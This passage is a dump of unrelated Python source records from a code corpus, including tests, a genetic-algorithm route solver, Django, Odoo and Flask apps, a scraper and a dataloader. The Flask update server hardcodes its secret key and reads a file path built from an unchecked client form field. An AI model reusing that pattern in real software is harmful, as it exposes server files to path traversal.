exclude_from_budget=True)\n logger.info(\"Category ID # %s was just created: %s\", category, name)\n assert isinstance(category, int)\n","sub_path":"tests/models/test_categories.py","file_name":"test_categories.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"225670132","text":"import time\nfrom mrq.job import Job\nimport pytest\n\n\n@pytest.mark.parametrize([\"p_service\"], [[\"mongodb\"], [\"redis\"]])\ndef test_disconnects_service_during_task(worker, p_service):\n \"\"\" Test what happens when mongodb disconnects during a job\n \"\"\"\n\n worker.start()\n\n if p_service == \"mongodb\":\n service = worker.fixture_mongodb\n elif p_service == \"redis\":\n service = worker.fixture_redis\n\n service_pid = service.process.pid\n\n job_id1 = worker.send_task(\"tests.tasks.general.Add\", {\n \"a\": 41, \"b\": 1, \"sleep\": 5}, block=False, queue=\"default\")\n\n time.sleep(2)\n\n service.stop()\n service.start()\n\n service_pid2 = service.process.pid\n\n # Make sure we did restart\n assert service_pid != service_pid2\n\n time.sleep(5)\n\n # Result should be there without issues\n assert Job(job_id1).fetch().data[\"result\"] == 42\n","sub_path":"tests/test_disconnects.py","file_name":"test_disconnects.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"59355599","text":"from random import randint\n\ndef main () :\n path = run ()\n\n print (\"The sortest path is : \" , end = '') ;\n\n for city in range (len (path)) :\n if city == (len (path) - 1) :\n print (path [city])\n\n else :\n print (path [city] , \"---> \" , end = '')\n\ndef run () :\n cities = ['A' , 'B' , 'C' , 'D' , 'E' , 'F' , 'G']\n map = createMap ()\n population = startingPopulation (map , cities)\n\n previous = list ()\n condition = True\n\n # The argument of range function is the number of evolution\n # you may change the number of evolution. 
It's up to you.\n\n for i in range (1000) :\n best_chromosome = findPurposeValue (map , population)\n\n # This \"if\" statement for comparing previous with best chromosome\n # and just execute once.\n\n if condition :\n previous = [i for i in best_chromosome]\n condition = False\n\n else :\n if calculateDistance (map , best_chromosome) < calculateDistance (map , previous) :\n previous = [i for i in best_chromosome]\n\n # At this point the best chromosome has to remove from population.\n # Otherwise it will do crossing over with itself.\n\n population.remove (best_chromosome)\n population = crossingOver (population , best_chromosome , cities)\n\n # Finally the best chromosome has to append to the population.\n # Otherwise the population will evanesce approximately at 6 generation.\n # (The iteration of evanesce is changeable according as your number of city)\n\n population.append (best_chromosome)\n\n # The previous variable is contain the shortest path (in other words the best chromosome).\n\n return previous\n\ndef createMap () :\n map = dict ()\n\n # At this point we have to create a map to apply our genetic algorithm.\n # There is 7 city and their ways from each one to other one.\n # You may set up distance according to your problem.\n\n map ['A'] = {'B' : 3 , 'C' : 7 , 'D' : 12 , 'E' : 9 , 'F' : 4 , 'G' : 15}\n map ['B'] = {'A' : 3 , 'C' : 2 , 'D' : 6 , 'E' : 5 , 'F' : 8 , 'G' : 13}\n map ['C'] = {'A' : 7 , 'B' : 2 , 'D' : 4 , 'E' : 3 , 'F' : 1 , 'G' : 5}\n map ['D'] = {'A' : 12 , 'B' : 6 , 'C' : 4 , 'E' : 11 , 'F' : 9 , 'G' : 5}\n map ['E'] = {'A' : 9 , 'B' : 5 , 'C' : 3 , 'D' : 11 , 'F' : 4 , 'G' : 1}\n map ['F'] = {'A' : 4 , 'B' : 8 , 'C' : 1 , 'D' : 9 , 'E' : 4 , 'G' : 7}\n map ['G'] = {'A' : 15 , 'B' : 13 , 'C' : 5 , 'D' : 5 , 'E' : 1 , 'F' : 7}\n\n return map\n\ndef startingPopulation (map , list_of_cities) :\n population = list ()\n\n # For 7 cities there is 7! 
possible starting chromosomes.\n    # This means you can choose a population size between 1 and 5,040.\n\n    number_of_population = randint (5 , 10)\n\n    for count in range (number_of_population) :\n        chromosome = list ()\n\n        while len (chromosome) < 7 :\n\n            # The \"randint\" method generates a random number\n            # between starting parameter (inclusive) and ending parameter (inclusive).\n            # So the range has to decrease once.\n\n            random_index = randint (0 , (len (list_of_cities) - 1))\n\n            if list_of_cities [random_index] not in chromosome :\n                chromosome.append (list_of_cities [random_index])\n\n        population.append (chromosome)\n\n    return population\n\ndef findPurposeValue (map , population) :\n    results = dict ()\n\n    for chromosome in population :\n        results [calculateDistance (map , chromosome)] = chromosome\n\n    value = min (results)\n\n    return results [value]\n\ndef calculateDistance (map , chromosome) :\n    distance = 0\n\n    for city in range (len (chromosome) - 1) :\n        neighbors = map [chromosome [city]]\n        distance += neighbors [chromosome [city + 1]]\n\n    return distance\n\ndef crossingOver (population , best_chromosome , cities) :\n\n    # The \"split_pieces\" variable determines the number of genes swapped during crossing over\n\n    split_pieces = randint (1 , (len (population [0]) // 2))\n\n    i = 0\n\n    while i < len (population) :\n        j = -1\n\n        while j >= (-1 * split_pieces) :\n            population [i][j] = best_chromosome [j]\n            j -= 1\n\n        population [i] = checkDuplicates (population [i] , cities)\n\n        # After the crossing over, there may be a mutation.\n        # Whether a mutation happens is decided randomly,\n        # again with the \"randint\" method.\n\n        if randint (1 , 15) % 3 == 0 :\n            population [i] = mutation (population [i])\n\n        i += 1\n\n    return population\n\ndef checkDuplicates (chromosome , cities) :\n    for city in cities :\n        if city not in chromosome :\n            i = 0\n            while i < len (chromosome) :\n                j = i + 1\n                while j < len (chromosome) :\n                    if chromosome [i] == chromosome [j] :\n                        chromosome [i] = city\n\n                    j += 1\n                i += 1\n\n    return chromosome\n\ndef mutation (chromosome) :\n\n    # The mutation operation needs two genes to swap with each other.\n\n    first = 0 # first gene index\n    second = 0 # second gene index\n\n    while first == second :\n\n        # These genes are chosen randomly\n\n        first = randint (1 , len (chromosome) - 1)\n        second = randint (1 , len (chromosome) - 1)\n\n    # Genes are moved simultaneously,\n\n    chromosome [first] , chromosome [second] = chromosome [second] , chromosome [first]\n\n    # and the chromosome is returned to the caller.\n\n    return chromosome\n\nif __name__ == \"__main__\" :\n    main ()","sub_path":"Source.py","file_name":"Source.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
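A small, hedged illustration of the fitness measure the Source.py record above optimizes: calculateDistance sums the length of each consecutive leg of the chromosome, without returning to the start city. The three-city map below is made up purely for this example; the real script uses its own seven-city map.

def route_length(dist_map, route):
    # sum the distance of each consecutive city pair, mirroring
    # calculateDistance in the record above
    return sum(dist_map[a][b] for a, b in zip(route, route[1:]))

toy_map = {'A': {'B': 3}, 'B': {'A': 3, 'C': 2}, 'C': {'B': 2}}
print(route_length(toy_map, ['A', 'B', 'C']))  # 3 + 2 = 5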
{"seq_id":"589269071","text":"# Copyright 2018 Onestein ()\n# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\n\nfrom odoo import api, fields, models\n\n\nclass ResPartner(models.Model):\n    _inherit = 'res.partner'\n\n    transus_gln = fields.Char(string='GLN')\n\n    _sql_constraints = [\n        ('name_uniq', 'unique(transus_gln, company_id)', 'Partner GLN must be unique per company!'),\n    ]\n\n    @api.multi\n    def check_gln(self):\n        is_correct = True\n        for partner in self:\n            if partner.transus_gln and len(partner.transus_gln) != 13:\n                is_correct = False\n        return is_correct\n\n    _constraints = [\n        (check_gln, \"The entered GLN is not correct.\", [\"transus_gln\"])\n    ]\n","sub_path":"transus/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"121842872","text":"import datetime\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils import timezone\nfrom django.db.models import Sum\nfrom .models import ReadCounter, VisitorCounter\n\n\ndef add_read_cnt_once(request, model_obj):\n    ct = ContentType.objects.get_for_model(model_obj)\n    key = \"{}_pk_{}\".format(str(ct.model), str(model_obj.pk))\n\n    if not request.COOKIES.get(key):\n        # if ReadCounter.objects.filter(content_type=ct, object_id=model_obj.pk).count():\n        #     readcounter = ReadCounter.objects.get(content_type=ct, object_id=model_obj.pk)\n        # else:\n        #     # no record yet\n        #     readcounter = ReadCounter(content_type=ct, object_id=model_obj.pk)\n        # # increment the read counter\n        # readcounter.read_cnt += 1\n        readcounter, created = ReadCounter.objects.get_or_create(content_type=ct, object_id=model_obj.pk)\n        readcounter.read_cnt += 1\n        readcounter.save()\n\n        # increment the visitor count\n        date = timezone.now().date()\n        visitorcounter, created = VisitorCounter.objects.get_or_create(content_type=ct, object_id=model_obj.pk, date=date)\n        visitorcounter.visitor_cnt += 1\n        visitorcounter.save()\n\n    return key\n\ndef get_latest_week_visit(content_type):\n    today = timezone.now().date()\n    visitor_cnt_list = []\n    dates_list = []\n\n    for i in range(7, 0, -1):\n        date = today - datetime.timedelta(days=i)\n        dates_list.append(date.strftime('%m-%d'))\n        visitorcounter = VisitorCounter.objects.filter(content_type=content_type, date=date)\n        result = visitorcounter.aggregate(visitor_sum=Sum('visitor_cnt'))\n        visitor_cnt_list.append(result['visitor_sum'] or 0)\n    return dates_list, visitor_cnt_list\n\ndef get_today_hot_blogs(content_type):\n    today = timezone.now().date()\n    visitor_cnt = VisitorCounter.objects.filter(content_type=content_type,\\\n            date=today).order_by('-visitor_cnt')\n    return visitor_cnt[:7]\n\ndef get_yesterday_hot_blogs(content_type):\n    today = timezone.now().date()\n    yesterday = today - datetime.timedelta(days=1)\n    # filter on yesterday, not today (the original queried today by mistake)\n    visitor_cnt = VisitorCounter.objects.filter(content_type=content_type,\\\n            date=yesterday).order_by('-visitor_cnt')\n    return visitor_cnt[:7]\n","sub_path":"reader/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"122845835","text":"#!/usr/bin/env python3\r\n\"\"\"\r\nThis is the server for the server-client-update-application.\r\nIf a client connects to this server, it checks for an update of the required software and if found, streams it to the client.\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nfrom flask import Flask, request, session\r\nfrom datetime import datetime\r\nimport platform\r\nimport json\r\n\r\n\r\napp = Flask(__name__)\r\n# set the secret key. keep this really secret:\r\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\r\n\r\n\r\n@app.route('/start_connection', methods = ['POST'])\r\ndef start_connection():\r\n\t\"\"\"\r\n\tStarts the connection of server and client.\r\n\tIn order to do so, stores everything in the session object. 
Starts the checking for update afterwards.\r\n\t\"\"\"\r\n\t# setup data\r\n\tsession['name'] = request.form['name']\r\n\tsession['date'] = request.form['date']\r\n\tsession['ip'] = request.remote_addr\r\n\tsession['processor'] = request.form['processor']\r\n\tsession['ram'] = request.form['ram']\r\n\tsession['platform'] = request.form['platform']\r\n\tsession['program'] = request.form['program']\r\n\tsession['version'] = request.form['version']\r\n\treturn (check_for_update())\r\n\r\n\r\ndef check_for_update():\r\n\t\"\"\"\r\n\tCompares the current version of the program with the one stored on the server.\r\n\tLoads the data of the updates stored on the server as json string and compares it. If update is available, starts downloading it.\r\n\t\"\"\"\r\n\twith open('packages.json') as json_string:\r\n\t\tjson_obj = json.load(json_string);\r\n\r\n\tif session['program'] not in json_obj:\r\n\t\treturn 'no update available for this software.'\r\n\r\n\tif session['version'] == json_obj[session['program']]['version']:\r\n\t\treturn 'software is up to date.'\r\n\telse :\r\n\t\treturn (get_update())\r\n\r\n# searches for the update package\r\ndef get_update():\r\n\t\"\"\"\r\n\tSearches for update package.\r\n\tIf found, stream it as binary to the client.\r\n\t\"\"\"\r\n\twith open('packages/' + session['program'] + '/' + session['program'] + '.zip', 'rb') as f:\r\n\t\tmy_file = f.read()\r\n\treturn my_file","sub_path":"py/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"5289534","text":"from bs4 import BeautifulSoup as bs\nimport requests\nimport re\nimport pandas as pd\nimport numpy as np\n\nr = requests.get(\"https://kuckjwi0928.github.io/pythoncodingprogram/\").text\nsoup = bs(r, 'html.parser')\ntexts = soup.find_all('td')\n\nDF = pd.DataFrame(columns=['Name', 'Phone', 'Value'])\nfor P in range(0, 4):\n if (P % 2 == 0):\n DF.loc[(P//2), ['Name']] = re.split('/', texts[P].text)[0]\n DF.loc[(P//2), ['Phone']] = re.split('/', texts[P].text)[1]\n else:\n pattern = re.compile('[A-Z가-힣]')\n DF.loc[(P//2), ['Value']] = ', '.join(pattern.findall(texts[P].text))\n\nprint(DF)\n","sub_path":"Group members/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"255480498","text":"#import boto3\nimport random\nimport multiprocessing\nimport time\n\n\n\n\ndef sleeper (n, name):\n print('Hi, I am Process {}. 
Sleeping for 3 seconds.'.format(name))\n    time.sleep(3)\n    print('{} is now awake'.format(name))\n\n\ndef inserter(name):\n    sqs = boto3.client('sqs')\n    #response = sqs.list_queues()\n    #print(response['QueueUrls'])\n\n    # Fifo queues have different requirements for keys inside sqs.send_message than Standard Q's.\n    queue_url = 'https://queue.amazonaws.com/308303745136/SL-test-FQ.fifo'\n\n    # Send message to SQS queue\n    count = 0\n    while count < 3:\n        count_str = str(count)\n        response = sqs.send_message(\n            MessageGroupId=count_str,\n            MessageDeduplicationId='{0}{1}{2}'.format(name, count, random.randint(1,1000000)),\n            QueueUrl=queue_url,\n            MessageBody=(\n                'Information'\n            )\n        )\n\n        count += 1\n        #if response['ResponseMetadata']['HTTPStatusCode'] != 200:\n        print(name, response)\n\n\nif __name__ == '__main__':\n    jobs = []\n    for i in range(5):\n        p = multiprocessing.Process(target=sleeper, args=(i, i))\n        jobs.append(p)\n        p.start()\n","sub_path":"Python/sqs.fifo.multiprocess.inserter.py","file_name":"sqs.fifo.multiprocess.inserter.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"17269226","text":"from grab import Grab\nfrom grab.spider import Spider, Task\nfrom urllib.parse import urljoin\nimport re\n\n\nclass OoqiaSpider(Spider):\n    def prepare(self):\n        self.initial_urls = ['https://attorneys.superlawyers.com/divorce/new-york-metro/new-york/']\n        self.attorneys = []\n        self.current_page = 1\n        self.current_att = 1\n        super(OoqiaSpider, self).prepare()\n\n    def task_initial(self, grab, task):\n        print('Current page: %s' % self.current_page)\n        container = grab.doc.select('//*[@id=\"browse_view\"]')\n        selector = './/*[contains(@class,\"search_result\")]'\n        for attorney in container.select(selector):\n            # att = dict()\n            # img_tag = attorney.select('.//*[@class=\"image\"]//img')\n            # if img_tag:\n            #     att['picture'] = img_tag.attr('src')\n            card = attorney.select('.//*[@class=\"text_container\"]')\n            # att['name'] = card.select('.//h2').text()\n            url = card.select('.//*[@class=\"indigo_text\"]//a').attr('href') \n            #import pdb; pdb.set_trace()\n            yield Task('attorney_detail', self.get_attorney_url(url)) \n            # self.attorneys.append(att)\n\n        pagination = grab.doc.select('//*[@class=\"pagination\"]')\n        next_page = pagination.select('.//a[@rel=\"next\"]')\n        if next_page:\n            url = next_page.attr('href')\n            self.current_page += 1\n            yield Task('initial', grab.make_url_absolute(url))\n\n    def task_attorney_detail(self, grab, task): \n        att = dict()\n        name = grab.doc.select('//*[@id=\"lawyer_bio_block\"]//*[@id=\"lawyer_name\"]').text()\n        practice_areas = grab.doc.select('//*[@id=\"lawyer_bio_block\"]//*[@id=\"practice_areas\"]').text()\n        img_tag = grab.doc.select('.//*[@class=\"image\"]//img')  # was attorney.select(...): NameError, no 'attorney' in this scope\n        if (name is not None and practice_areas is not None):\n            self.current_att += 1\n            print(' (%s) Current Attorney: %s' % (self.current_att, name))\n            print(' (%s) Practice Areas: %s' % (self.current_att, practice_areas))\n\n    def get_attorney_url(self, url):\n        g = Grab()\n        g.setup(follow_location=True, connect_timeout=10) \n        g.go(url)\n        if g.doc.code == 200: \n            return g.doc.url\n\n    def make_url_absolute(grab, href, force_https=False):\n        if grab.config['url']:\n            base_url = grab.doc.url\n            url = urljoin(base_url, href)\n        else:\n            url = href\n        if force_https and url.startswith('http://'):\n            url = re.sub('^http:\\/\\/', 'https://', url)\n        return url\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
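A minimal, hedged sketch of the same follow-the-rel="next" pagination pattern used in scraper.py above, written with requests and BeautifulSoup (both already used elsewhere in this file); the listing URL is an illustrative assumption, not the real site, and the CSS classes simply mirror those in the record.

import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

url = 'https://example.com/attorneys'  # hypothetical listing page
while url:
    soup = BeautifulSoup(requests.get(url, timeout=10).text, 'html.parser')
    # collect the detail-page links from each result card
    for a in soup.select('.search_result .indigo_text a'):
        print(urljoin(url, a.get('href', '')))
    # follow the rel="next" pagination link until there is none
    nxt = soup.select_one('.pagination a[rel="next"]')
    url = urljoin(url, nxt['href']) if nxt else None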
url\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"565101342","text":"import os\nimport os.path\nimport numpy as np\nimport torch.utils.data as data\nfrom dataloaders.associate import read_file_list, associate\nfrom path import Path\nimport dataloaders.custom_transforms as custom_transforms\nimport cv2\n\n_EPS = np.finfo(float).eps * 4.0\n\n\ndef transform34(l):\n \"\"\"\n Generate a 3x4 homogeneous transformation matrix from a 3D point and unit quaternion.\n\n Input:\n l -- tuple consisting of (stamp,tx,ty,tz,qx,qy,qz,qw) where\n (tx,ty,tz) is the 3D position and (qx,qy,qz,qw) is the unit quaternion.\n\n Output:\n matrix -- 4x4 homogeneous transformation matrix\n \"\"\"\n t = l[:3]\n q = np.array(l[3:7], dtype=np.float64, copy=True)\n nq = np.dot(q, q)\n if nq < _EPS:\n return np.array((\n (1.0, 0.0, 0.0, t[0]),\n (0.0, 1.0, 0.0, t[1]),\n (0.0, 0.0, 1.0, t[2]),\n (0.0, 0.0, 0.0, 1.0)\n ), dtype=np.float64)\n q *= np.sqrt(2.0 / nq)\n q = np.outer(q, q)\n return np.array((\n (1.0 - q[1, 1] - q[2, 2], q[0, 1] - q[2, 3], q[0, 2] + q[1, 3], t[0]),\n (q[0, 1] + q[2, 3], 1.0 - q[0, 0] - q[2, 2], q[1, 2] - q[0, 3], t[1]),\n (q[0, 2] - q[1, 3], q[1, 2] + q[0, 3], 1.0 - q[0, 0] - q[1, 1], t[2])\n ), dtype=np.float64)\n\ndef read_calib_file(path):\n # taken from https://github.com/hunse/kitti\n float_chars = set(\"0123456789.e+- \")\n data = {}\n with open(path, 'r') as f:\n for line in f.readlines():\n key, value = line.split(':', 1)\n value = value.strip()\n data[key] = value\n if float_chars.issuperset(value):\n # try to cast to float array\n try:\n data[key] = np.array(list(map(float, value.split(' '))))\n except ValueError:\n # casting error: data[key] already eq. 
value, so pass\n pass\n\n return data\n\n\ndef make_dataset(dir, sequence_length=1, used_only_left_images=False, used_sequences=None):\n sequences = []\n dir = os.path.expanduser(dir)\n for target in sorted(os.listdir(dir)):\n d = os.path.join(dir, target)\n split = str(d).split('/')\n if not os.path.isdir(d) or (used_sequences is not None and not split[-1] in used_sequences):\n continue\n\n root = Path(d)\n\n rgb_list = read_file_list(root / \"rgb.txt\")\n depth_list = read_file_list(root / \"depth.txt\")\n pose_list = read_file_list(root / \"groundtruth.txt\")\n\n rgbd_matches = dict(associate(rgb_list, depth_list, offset=list(rgb_list)[0] - list(depth_list)[0]))\n rgbdt_matches = associate(rgbd_matches, pose_list, offset=list(rgb_list)[0] - list(pose_list)[0])\n\n rgb_files = [root / rgb_list[a][0] for a, b in rgbdt_matches]\n depth_files = [root / depth_list[rgbd_matches[a]][0] for a, b in rgbdt_matches]\n poses = [transform34(pose_list[b]) for a,b in rgbdt_matches]\n poses = np.array(poses)\n\n assert len(rgb_files) == len(depth_files) == len(poses)\n\n intrinsics = np.loadtxt(root / \"intrinsics.txt\").reshape(3, 3)\n\n for i in range(len(rgb_files) - sequence_length + 1):\n sequence = {'reset': i == 0, 'rgb_images': [], 'depth_images': [], 'intrinsics': intrinsics, 'poses': None}\n\n if sequence_length == 1:\n sequence['poses'] = poses[i].reshape(1, 3, 4)\n else:\n first_pose = poses[i]\n current_poses = np.copy(poses[i:i + sequence_length])\n current_poses[:, :, -1] -= first_pose[:, -1]\n current_poses = np.linalg.inv(first_pose[:, :3]) @ current_poses\n sequence['poses'] = current_poses\n\n for j in range(sequence_length):\n sequence['rgb_images'].append(rgb_files[i + j])\n sequence['depth_images'].append(depth_files[i + j])\n sequences.append(sequence)\n\n return sequences\n\n\nclass TUMLoader(data.Dataset):\n def __init__(self, root, type, sequence_length=1, output_size=(320, 384), use_only_left_images=False, sequences=None):\n self.samples = make_dataset(Path(root) / type, sequence_length, use_only_left_images, used_sequences=sequences)\n assert len(self.samples) > 0, \"Found 0 images in subfolders of: \" + root + \"\\n\"\n self.root = root\n self.type = type\n self.output_size = output_size\n self.sequence_length = sequence_length\n\n def train_transform(self, rgb_images, depth_images, intrinsics, poses):\n jitter = custom_transforms.ColorJitter.get_params(0.4, 0.4, 0.4, 0.0)\n train_transform = custom_transforms.Compose([\n custom_transforms.RandomRotate(5.0),\n custom_transforms.CenterCrop(self.output_size),\n custom_transforms.RandomHorizontalFlip(),\n custom_transforms.RandomReverseOrder(),\n jitter,\n custom_transforms.ArrayToTensor()\n ])\n\n return train_transform(rgb_images, depth_images, intrinsics, poses)\n\n\n def val_transform(self, rgb_images, depth_images, intrinsics, poses):\n valid_transform = custom_transforms.Compose([\n custom_transforms.CenterCrop(self.output_size),\n custom_transforms.ArrayToTensor()\n ])\n\n return valid_transform(rgb_images, depth_images, intrinsics, poses)\n\n def __getitem__(self, index):\n sample = self.samples[index]\n\n rgb_files = sample[\"rgb_images\"]\n depth_files = sample[\"depth_images\"]\n\n rgb_images = [cv2.imread(f) for f in rgb_files]\n depth_images = [cv2.imread(f, cv2.IMREAD_UNCHANGED).astype(np.float32) / 5000.0 for f in depth_files]\n intrinsics = np.copy(sample[\"intrinsics\"]).astype(np.float32)\n poses = np.copy(sample[\"poses\"]).astype(np.float32)\n\n if self.type == \"train\":\n image_tensors, depth_tensors, 
intrinsics, transformed_poses = self.train_transform(rgb_images, depth_images,\n intrinsics,\n poses)\n elif self.type == \"val\":\n image_tensors, depth_tensors, intrinsics, transformed_poses = self.val_transform(rgb_images, depth_images,\n intrinsics,\n poses)\n else:\n raise Exception(\"Invalid dataloader type! (Needs to be either 'train' or 'val'.\")\n\n if poses is None:\n poses = np.zeros((self.sequence_length, 3, 4), dtype=np.float32)\n if transformed_poses is None:\n transformed_poses = np.zeros((self.sequence_length, 3, 4), dtype=np.float32)\n\n return sample[\"reset\"], image_tensors, depth_tensors, intrinsics, np.linalg.inv(intrinsics), poses, transformed_poses\n\n def __len__(self):\n return len(self.samples)\n","sub_path":"dataloaders/tum_rgbd_loader.py","file_name":"tum_rgbd_loader.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"297547541","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n \n path('', home, name=\"home\"),\n path('honor/',honor, name=\"honor\"),\n path('honorRegister1/',honorRegister1, name=\"honorRegister1\"),\n path('honorRegister2/',honorRegister2, name=\"honorRegister2\"),\n path('honorRegistered//',honorRegistered, name=\"honorRegistered\"),\n path('free/', free, name=\"free\"),\n path('freeRegister1/',freeRegister1, name=\"freeRegister1\"),\n path('freeRegister2/',freeRegister2, name=\"freeRegister2\"),\n path('freeRegistered/',freeRegistered, name=\"freeRegistered\"),\n path('aboutUs/',aboutUs, name=\"aboutUs\"),\n path('searchMap/',searchMap,name=\"searchMap\"),\n path('searchResult/',searchResult, name='searchResult'),\n \n path('mypage/',mypage,name=\"mypage\"),\n \n path('mypageDiary/',mypageDiary,name=\"mypageDiary\"),\n path('mypageDiaryCreate/',mypageDiaryCreate,name=\"mypageDiaryCreate\"),\n \n path('mypagePhoto/',mypagePhoto,name=\"mypagePhoto\"),\n path('mypagePhotoCreate/',mypagePhotoCreate,name=\"mypagePhotoCreate\"),\n \n path('mypageVisitorBook/',mypageVisitorBook,name=\"mypageVisitorBook\"),\n path('mypageVisitorBookCreate/',mypageVisitorBookCreate,name=\"mypageVisitorBookCreate\"),\n \n \n path('mypageOption/',mypageOption,name=\"mypageOption\"),\n path('mypageUpdate/',mypageUpdate,name=\"mypageUpdate\"),\n \n \n path('enroll/',enroll, name=\"enroll\"),\n path('enroll2/',enroll2, name=\"enroll2\"),\n path('enrolled/',enrolled, name=\"enrolled\"),\n path('caaard/', caaard, name=\"caaard\"),\n path('csCenter/', csCenter, name=\"csCenter\"),\n path('q_and_a/', q_and_a, name=\"q_and_a\"),\n path('idFind/', idFind, name=\"idFind\"),\n path('pwFind/', pwFind, name=\"pwFind\"),\n path('normal/',normal, name=\"normal\"),\n path('animal_delete/',delete,name=\"delete\"),\n]","sub_path":"dbgproject/dbg/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"119055847","text":"from sys import stdin, setrecursionlimit\nfrom collections import defaultdict\nfrom heapq import heapify, heappush, heappushpop\n\n\ndef main():\n input = stdin.buffer.readline\n n, m = map(int, input().split())\n ab = [list(map(int, input().split())) for _ in range(n)]\n\n dic = defaultdict(list)\n for a, b in ab:\n dic[a].append(b)\n\n q = []\n heapify(q)\n\n for i in sorted(dic.keys(), reverse=True):\n for j in sorted(dic[i], reverse=True):\n if len(q) <= m - i:\n heappush(q, j)\n elif q and 
q[0] < j:\n heappushpop(q, j)\n\n print(sum(q))\n\n\nif __name__ == \"__main__\":\n setrecursionlimit(10000)\n main()\n","sub_path":"Python_codes/p02948/s990116518.py","file_name":"s990116518.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"544177016","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 13 21:54:55 2016\n\n@author: Kapythone\n\"\"\"\n\ndef wordBreak(s, wordDict):\n hashmap = {}\n for w in wordDict:\n hashmap[w] = 1\n \n return f(s, hashmap)\n \ndef f(s, hashmap):\n if s == '':\n return True\n\n pres = []\n for i in range(1, len(s) + 1):\n pres.append(s[:i])\n \n for p in pres:\n if p in hashmap:\n if f(s[len(p):], hashmap) == True:\n return True\n \n return False","sub_path":"Word Break.py","file_name":"Word Break.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"168161900","text":"from typing import Dict\n\nimport MySentrySettings\nimport requests\nimport traceback\n\n\nclass ErrorLogSender:\n\n def __init__(self, app_id: int, app_token: str):\n assert isinstance(app_id, int), f'id not int'\n assert isinstance(app_token, str) and len(app_token) != 0, f'token is empty or not string'\n self.id = app_id\n self.token = app_token\n\n def sender(self, error_log: Dict) -> None:\n assert len(error_log) == 3 and ['error_type', 'error_message', 'error_stack_trace'] == list(error_log.keys()), \\\n f'error_log is invalid'\n url = f'http://127.0.0.1:8000/apps/{self.id}/error_log/'\n requests.post(url, data=error_log, headers={'token': self.token})\n\n\ndef error_searcher(fun):\n def wrapper():\n app = ErrorLogSender(MySentrySettings.settings['id'], MySentrySettings.settings['token'])\n try:\n return fun()\n except Exception as error:\n error_dict_for_sender = {\n 'error_type': error.__class__.__name__,\n 'error_message': error.__str__(),\n 'error_stack_trace': ''.join(traceback.format_stack())\n }\n app.sender(error_dict_for_sender)\n\n return wrapper\n\n","sub_path":"sdk_for_MySentry/sdk_for_mysentry_pgk/sdk.py","file_name":"sdk.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"550264025","text":"# -*- coding: utf-8 -*-\nimport time\nfrom website.core import ObjectType\n\nclass Client(object):\n CLIENT_ANDROID = 1\n CLIENT_IOS = 2\n CLIENT_WX = 3\n\n @classmethod\n def gen_id(cls, db):\n obj_type = ObjectType.CLIENT\n result = db.execute(\"INSERT INTO _object (`type`) VALUES (%s)\", obj_type)\n return result.lastrowid\n\n\n @classmethod\n def create_client(cls, db, client_id, appid, developer_id, platform_type, platform_identity):\n now = int(time.time())\n sql = \"INSERT INTO client(id, app_id, developer_id, platform_type, platform_identity, ctime, utime) VALUES(%s, %s, %s, %s, %s, %s, %s)\"\n r = db.execute(sql, (client_id, appid, developer_id, platform_type, platform_identity, now, now))\n return r.lastrowid\n\n @classmethod\n def create_wx(cls, db, client_id, gh_id, wx_appid, refresh_token, store_id):\n sql = \"INSERT INTO client_wx(client_id, gh_id, wx_app_id, refresh_token, store_id, is_authorized) VALUES(%s, %s, %s, %s, %s, %s)\"\n r = db.execute(sql, (client_id, gh_id, wx_appid, refresh_token, store_id, 1))\n return r.lastrowid\n\n @classmethod\n def get_app(cls, db, gh_id):\n sql = \"SELECT app.id as id, app.name as name, app.developer_id as developer_id FROM client_wx, client, 
